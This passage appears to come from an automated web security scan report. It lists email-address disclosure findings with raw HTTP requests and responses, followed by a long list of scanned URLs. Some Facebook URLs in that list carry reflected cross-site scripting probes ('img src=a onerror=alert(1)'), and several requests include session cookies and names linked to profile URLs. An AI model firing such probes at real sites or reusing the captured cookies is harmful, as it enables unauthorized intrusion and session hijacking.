User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
Go Daddy Software. If you are visually impaired and would like to check the availability of a domain, make a purchase, or just have questions please call us at (480) 505-8877. You may also email us at support@godaddy.com to request a website service callback.. We are currently in the process of implementing more accessibility for our visitors so feel free to check back in the near future..Thank you for your interest i
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...

19.8. http://www.google.com/s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/s

Issue detail

The following email address was disclosed in the response:

bjor...@lumeta.com

Request

GET /s?hl=en&sugexp=ldymls&pq=bucky%20a%20jordan&xhr=t&q=Bucky%20A%20Jordan%20A&cp=16&pf=p&sclient=psy&source=hp&aq=&aqi=&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=2be2441b25e78025&biw=907&bih=1007&tch=1&ech=2&psi=YA_CTavYJIXUgQeEwdG4Dg.1304581553510.1 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Bucky+A+Jordan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:45:59 GMT
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: application/json; charset=UTF-8
Pragma: no-cache
Content-Disposition: attachment
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 103094

{e:"Zw_CTcnvLsrysga2jvnbDw",c:1,u:"http://www.google.com/s?hl\x3den\x26sugexp\x3dldymls\x26pq\x3dbucky%20a%20jordan\x26xhr\x3dt\x26q\x3dBucky%20A%20Jordan%20A\x26cp\x3d16\x26pf\x3dp\x26sclient\x3dpsy\
...[SNIP]...
\\x3e\\x3cdiv class\\x3d\\x22s\\x22\\x3eFrom, Sent On, Attachments. \\x3cem\\x3eBucky Jordan\\x3c/em\\x3e, Sep 18, 2006 12:23 pm \\x3cb\\x3e...\\x3c/b\\x3e From: \\x3cem\\x3eBucky Jordan\\x3c/em\\x3e (bjor...@lumeta.com). Date: Sep 18, 2006 12:23:17 pm \\x3cb\\x3e...\\x3c/b\\x3e\\x3cbr\\x3e\\x3cspan class\\x3df\\x3e\\x3ccite\\x3emarkmail.org/message/5wmsv36cbmj52zkm\\x3c/cite\\x3e - \\x3cspan class\\x3dgl\\x3e\\x3ca
...[SNIP]...

19.9. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

bjor...@lumeta.com

Request

Response

19.10. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/02/holocaust-memorial-day_n_856638.html

Issue detail

The following email address was disclosed in the response:

world@huffingtonpost.com

Request

Response

19.11. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Issue detail

The following email addresses were disclosed in the response:

jason@huffingtonpost.com
media@huffingtonpost.com
tv@huffingtonpost.com

Request

Response

19.12. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/osama-bin-laden-pictures_n_857568.html

Issue detail

The following email addresses were disclosed in the response:

jen.bendery@huffingtonpost.com
world@huffingtonpost.com

Request

Response

19.13. http://www.lakewoodbeacon.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lakewoodbeacon.org
Path:	/

Issue detail

The following email address was disclosed in the response:

info@lakewoodbeacon.org

Request

Response

19.14. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The following email address was disclosed in the response:

yourfriend@email.com

Request

Response

19.15. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The following email address was disclosed in the response:

yourfriend@email.com

Request

Response

19.16. https://www.neodata.com/pub/snew/new_print.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neodata.com
Path:	/pub/snew/new_print.shtml

Issue detail

The following email address was disclosed in the response:

sportingnews@emailcustomerservice.com

Request

GET /pub/snew/new_print.shtml HTTP/1.1
Host: www.neodata.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Sporting News Magazine - Sporting News</title>
<link href="htt
...[SNIP]...
<input type="hidden" name="iEmailAdr" value="sportingnews@emailcustomerservice.com">
...[SNIP]...

19.17. http://www.popeater.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popeater.com
Path:	/

Issue detail

The following email address was disclosed in the response:

yourfriend@email.com

Request

GET / HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:54 GMT; path=/
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932473" href="mailto:yourfriend@email.com?subject=Check this out:Kristen Bell, Dax Shepard Not Planning a Wedding&body=http://www.popeater.com/2011/05/05/kristen-bell-dax-shepard-no-wedding/" title="Kristen Bell, Dax Shepard Not Planning a We
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932453" href="mailto:yourfriend@email.com?subject=Check this out:David Spade Donates $200,000 to Tornado Relief Efforts&body=http://www.popeater.com/2011/05/05/david-spade-tornado-relief-efforts/" title="David Spade Donates $200,000 to Tornad
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932251" href="mailto:yourfriend@email.com?subject=Check this out:Kendra Wilkinson Reveals Plans to Have Another Baby&body=http://www.popeater.com/2011/05/05/kendra-wilkinson-another-baby/" title="Kendra Wilkinson Reveals Plans to Have Another
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932187" href="mailto:yourfriend@email.com?subject=Check this out:\'The Tudors\' Star Jonathan Rhys Meyers Checks into Rehab&body=http://www.popeater.com/2011/05/05/jonathan-rhys-meyers-rehab/" title="\'The Tudors\' Star Jonathan Rhys Meyers C
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932142" href="mailto:yourfriend@email.com?subject=Check this out:Nicole Scherzinger and 50 Cent Get \'Freaky\' in \'Right There\' Video&body=http://www.popeater.com/2011/05/05/nicole-scherzinger-right-there-video/" title="Nicole Scherzinger a
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932130" href="mailto:yourfriend@email.com?subject=Check this out:Glenn Beck and My Chemical Romance Feud Over \'Propaganda\' Accusations&body=http://www.popeater.com/2011/05/05/my-chemical-romance-glenn-beck/" title="Glenn Beck and My Chemica
...[SNIP]...
<a name="aol-share" class="aol-share" data-bid="341" data-pid="19932301" href="mailto:yourfriend@email.com?subject=Check this out:Video: Haley Reinhart Blows the Roof Off on \'American Idol\'&body=http://www.popeater.com/2011/05/05/haley-reinhart-house-of-rising-sun/" title="Video: Haley Reinhart Blows the
...[SNIP]...

19.18. http://www.truveo.com/client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js

Issue detail

The following email address was disclosed in the response:

kevin.muller@enova-tech.net

Request

GET /client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
Referer: http://www.truveo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; ab=univ_ent; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Expires: Mon, 28 Jul 2014 23:30:00 GMT
Cache-Control: max-age=315360000
Access-Control-Allow-Oritin: *
Content-Type: application/x-javascript
Content-Length: 20009

/*
*
* Copyright (c) 2007 e-nova technologies pvt. ltd. (kevin.muller@enova-tech.net || http://www.enova-tech.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
...[SNIP]...

20. Private IP addresses disclosed previous next
There are 658 instances of this issue:

http://www.crunchgear.com/wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg
http://www.crunchgear.com/wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg
http://www.facebook.com/
http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd
http://www.facebook.com/1242845259
http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b
http://www.facebook.com/2008/fbml
http://www.facebook.com/AOLrealestate
http://www.facebook.com/BPAmerica
http://www.facebook.com/BPAmerica
http://www.facebook.com/BPAmerica
http://www.facebook.com/DailyFinance
http://www.facebook.com/HockeyKen
http://www.facebook.com/KickIceForever
http://www.facebook.com/LadyBonesie
http://www.facebook.com/Loizza
http://www.facebook.com/aim
http://www.facebook.com/ajax/connect/feedback.php
http://www.facebook.com/ajax/connect/vote.php
http://www.facebook.com/ajax/connect/vote.php
http://www.facebook.com/ajax/connect/vote.php
http://www.facebook.com/ajax/connect/vote.php
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/reg_birthday_help.php
http://www.facebook.com/ajax/register/logging.php
http://www.facebook.com/aol
http://www.facebook.com/aolradio
http://www.facebook.com/badges
http://www.facebook.com/badges
http://www.facebook.com/badges
http://www.facebook.com/burkerkink
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/captcha/tfbimage.php
http://www.facebook.com/captcha/tfbimage.php
http://www.facebook.com/careers/
http://www.facebook.com/careers/
http://www.facebook.com/careers/
http://www.facebook.com/deedee.perez1
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/facebook
http://www.facebook.com/favicon.ico
http://www.facebook.com/fayse
http://www.facebook.com/find-friends
http://www.facebook.com/find-friends
http://www.facebook.com/find-friends
http://www.facebook.com/find-friends
http://www.facebook.com/gale.l.schenk
http://www.facebook.com/help/
http://www.facebook.com/help/
http://www.facebook.com/help/
http://www.facebook.com/help/
http://www.facebook.com/help/
http://www.facebook.com/home.php
http://www.facebook.com/images/policy/TRUSTe_EU.png
http://www.facebook.com/images/policy/TRUSTe_verify.png
http://www.facebook.com/izaOllie
http://www.facebook.com/jezzas
http://www.facebook.com/kimberly.christ
http://www.facebook.com/ladonna.lokey
http://www.facebook.com/lakendra.roberts
http://www.facebook.com/login.php
http://www.facebook.com/login.php
http://www.facebook.com/mapquest
http://www.facebook.com/matthew.oliveira2
http://www.facebook.com/mmafighting
http://www.facebook.com/mobile
http://www.facebook.com/mobile
http://www.facebook.com/mobile
http://www.facebook.com/mobile
http://www.facebook.com/mobile/
http://www.facebook.com/mobile/
http://www.facebook.com/mobile/
http://www.facebook.com/mobile/
http://www.facebook.com/pages/Barnesville/115038011847083
http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820
http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478
http://www.facebook.com/pages/Blaine-Senior-High/106189406087059
http://www.facebook.com/pages/Editor-in-Chief/137829579583400
http://www.facebook.com/pages/Gilco-Corporation/109823499042436
http://www.facebook.com/pages/HMFIC/149403761740008
http://www.facebook.com/pages/HuffPost-World/70242384902
http://www.facebook.com/pages/Manchester-Connecticut/112527912096312
http://www.facebook.com/pages/Merchandiser/123981654314779
http://www.facebook.com/pages/New-Haven-College/130105783687523
http://www.facebook.com/pages/Northern-Illinois-University/108155335871674
http://www.facebook.com/pages/San-Antonio-Texas/110297742331680
http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707
http://www.facebook.com/pages/Sporting-News/104068362964496
http://www.facebook.com/pages/ToP-SeCNeT/195242630519520
http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161
http://www.facebook.com/pages/create.php
http://www.facebook.com/pages/create.php
http://www.facebook.com/pages/create.php
http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580
http://www.facebook.com/patroyo
http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Bucky-Jordan%20/100000824820783
http://www.facebook.com/people/Bucky-Jordan%20/100000824820783
http://www.facebook.com/people/Bucky-Jordan%20/100000824820783
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
